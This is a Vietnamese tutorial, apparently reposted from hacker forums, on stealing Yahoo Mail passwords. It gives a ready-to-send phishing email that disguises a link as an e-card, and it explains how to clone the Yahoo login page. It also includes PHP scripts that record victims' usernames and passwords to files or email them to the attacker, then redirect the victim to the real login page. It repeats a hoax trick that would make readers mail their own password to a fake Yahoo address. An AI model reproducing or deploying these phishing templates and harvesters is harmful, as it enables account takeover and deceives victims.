Lấy Mật Khẩu (password Thủ công)

+Trước hết mở hộp thư cua các bạn ra,chọn composed để bắt đầu gửi thư

+Trong phần nội dung,chọn View HTML source,sau đó biên soạn nội dung sau:

Ban co 1 buc dien hoa tu Congaquay85(hoac ten cua ban) voi tieu de nhu sau :

Chuc ban vui ve

Hay nhap chuot vao day de xem buc dien hoa

http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php


You have a greeting crad from Congaquay85 with subject :

chuc ban vui ve

Click here to view greeting card

http://dienhoa.vnn.vn/1&YY=80401&inc=25&or...pos=0&/view.php



Trong phần nội dung thư bạn cứ copy nguyên đoạn này vào là được :

----------------------------------------------------------------------------------------------------

<p>Ban co 1 buc dien hoa tu Congaquay85 voi tieu de nhu sau :</p>


<p>Chuc ban vui ve</p>


<p>Hay nhap chuot vao day de xem buc dien hoa</p>


<p><a href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&YY=80401& inc=25&order=down&sort=date&pos=0&/view.php</a></p>


<p></p>


<p>You have a greeting crad from Tran hung anh with subject :</p>


<p>chuc ban vui ve</p>


<p>Click here to view greeting card</p>


<p><a href="http://www.00dt1.com">http://dienhoa.vnn.vn/1&YY=80401& inc=25&order=down&sort=date&pos=0&/view.php</a></p>

-------------------------------------------------------------------------------------------

-Sau khi soạn thảo nội dung bức thư xong,bạn hãy gửi nó cho đối tượng bạn muốn lấy pass.Nếu đối tượng mở trang web giả mạo trên,lập tưc password sế bị lộ.Khi đó bạn hãy vào trang web này để xem kết quả:http://00dt1yahoofake.dk3.com

Nào,bắt đầu tấn công đi,chúc các bạn thành công!


Ngoài ra bạn cũng có thể sủ dụng cách này để đạt được sác xuất thanh công cao hơn

#Cách 1: bạn có thể tạo 1 giao diện giống hệt như Yahoo (việc này thì dễ ợt chứ gì nữa), sau đó sửa đổi chút xíu... hê hê...để cho khi victim gõ pass và user name thì alê hấp, pass bay như chim về email của ta, còn victim thì vẫn vào hòm thư mà không hề hay biết. Việc này bạn có thể thực hiện dễ dàng bằng front page xây dưng mà không cần hiểu biết nhiều về html. Sau khi tạo xong giao diện, upload lên thì bạn chỉ việc dụ victim vào tròng...khà khà...nếu bạn muốn thử nghiệm thì cứ việc ra ngoài hàng rùi để homepage ở đó là cái địa chỉ trang web mà bạn dùng để câu, chắc chắn là sế có nhiều chú thỏ vào bẫy.

#Cách 2: Tất cả đều phải thực hiện trên account Yahoo mail của bạn bởi vì bức tường lửa của họ đã được nâng cấp bằng Unix-Apache sever.
1. Gửi một email tới: [email protected] <mailto:[email protected]>
2. Dòng tiêu đề Subject của email là: Find password.
3. Tiếp đến là nội dung email bạn đánh vào đoạn JScript sau:
/config/cgi-bin/start?v703&login= "Tên login của bạn"&f="password của bạn"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh thêm @yahoo.com nhe!)
Ví dụ:
Tên login của bạn là "hacker", password là "nobody" và địa chỉ muốn lấy pass là "[email protected] <mailto:[email protected]>" chẳng hạn thì bạn đánh như sau:
/config/cgi-bin/start?v703&login="hacker"&f="nobody"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="[email protected] <mailto:[email protected]>"
*The Yahoo system cần password của bạn để họ có thể gửi một javascript từ account của bạn trên Yahoo sever tới một password của người khác. Password sế tự động được gửi đến email của bạn trong dấu"".
Cách này tuy dễ thực hiện nhưng tỷ lệ thành cũng chỉ khoảng 60%, bởi vì nếu Web Browser của nạn nhân mà không hỗ trợ JS thì đành bó tay thôi, sau 2 phút chờ đợi mà không thấy Yahoo sever hồi âm thì có lế bạn lên chuyển sang cách sau


#Cách 3: 1. Vào Bravenet.com đăng kí một accout và đăng kí formmail bravenet.Trong phần Setting bạn chọn đường dẫn URL là địa chỉ mà bạn muốn chuyển đến sau khi lừa họ check mail, bạn lên chọn đường dẫn đến đến địa chỉ mà Yahoo báo lỗi khi Login bằng cách vào Yahoo mail và đánh một cái ID tầm bậy nha, sau đó bạn cũng gõ pass luôn và bấm checkmail, yahoo sế báo là sai mật khẩu bạn hãy chép cái đường dẫn URL này và dán vào trong mục URL của bravenet.
2. Sau khi hoàn thành bước đầu thì bạn chuyển sang bước kế tiếp chỉnh lại trong mail yahoo đó nhớ là bạn phải làm 2 giao diện một giao diện yahoo là sẵn sàng Login vào mail và cái thứ 2 là sai mật khẩu, tới đây chắc các bạn hiểu rồi phải không? để khi victim checkmail thì đường dẫn thank sế báo là sai mật khẩu và lần này thì 100% là victim checkmail thành công nhưng cũng đồng nghĩa với mất mật khẩu, mật khẩu của victim sế được chuyển về hộp mail mà lúc bạn đăng lí bên bravenet.com. Bạn chỉ còn việc đi rải "bom" shortcut checkmail và chỉ chờ cho victim checkmail là OK!

Tuy nhiên hiện nay bravenet đã yêu cầu chứng nhận thông tin của emailform trước khi gửi đi do đó chúng ta chỉ dùng cách này để tham khảo mà không dùng được nữa vì nạn nhân sế phát hiện ra ngay. Bởi vậy, tại sao chúng ta không tự tạo ra code cho mình, vừa nhiều tính năng hơn lại khỏi phải phụ thuộc.

2. Tự tạo code:

Trước tiên, bạn đăng kÿ một free host có hỗ trợ PHP, tôi thấy tốt nhất là cái http://tripod.lycos.co.uk việc này rất dễ , chỉ cần bạn đăng ký làm thành viên của trang này, sau đó làm theo các chỉ dẫn mà nó gửi về mail cho bạn là có thể có một free host dạng:

http://members.lycos.co.uk/tenban

host này có acount FTP nhưng không thể dùng được mà các bạn phải dùng web2ftp.com mà upload. Dùng trang này rất dễ. Nào chúng ta làm:

1. tạo các tệp sau: (dùng Notepate, sau đó khi save chọn Allfile với tên tệp là yahoo1.php chẳng hạn)

yahoo1.php:

<?
$f=fopen("yahoo.html","a");
fwrite($f,"$[email protected] : $passwd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?6rfn98...romo=&.intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");
?>

yahoo2.php:

<?
$f=fopen("yahoo.txt","a");
fwrite($f,"$[email protected] : $passwd\n=====================\n");
fclose($f);
header("location: http://login.yahoo.com/config/login?6rfn98...romo=&.intltype =us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");
?>


yahoo3.php

<?
$contactemail = "[email protected]"; //
$subject = "password of $[email protected] : $passwd";
$message = "";
mail($contactemail, $subject, $message);
header("location: http://login.yahoo.com/config/login?6rfn98...m4&.tries=&.src =ym&.last=&promo=&.intltype=us&.bypass=&.partner=&.u= 6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done=&login= $login&passwd=$passwd&.persistent=");
?>

Tạo tiếp 2 tệp trắng (không có nội dung gì ) là: yahoo.html và yahoo.txt

2. Dùng http://web2ftp.com upload 5 tệp này lên trang lycos của bạn

3. Dùng code:

a. Thay code của bravenet (nếu trước đó bạn đang dùng code của bravenet) bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo3.php" method="post">

nếu bạn muốn gửi kết quả về mail cho bạn

b. Thay code của bravenet bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo1.php" method="post">

nếu bạn muốn kết quả được in ra trang yahoo.html sau đó mỗi lần xem bạn chỉ cần gõ:

http://members.lycos.co.uk/tenban/yahoo.html

c. Thay code của bravenet bằng:

<FORM action="http://members.lycos.co.uk/tenban/yahoo2.php" method="post">

nếu bạn muốn kết quả được in ra trang yahoo.txt sau đó mỗi lần xem bạn dùng FTP mở trang này ra hoặc có thể gõ http://members.lycos.co.uk/tenban/yahoo.txt nếu bạn chmod file yahoo.txt là 666 (-rw-rw-rw)

Chú ÿ, nếu bạn dùng emalform khÿng phải là copy của trang mail.yahoo.com thì khi tạo form nhớ đặt Name cho ÿ "login" và "đăng nhập" lần lượt là login và passwd.

Trần Vinh Thịnh
Sưu Tầm Tử Các Trang Web Khác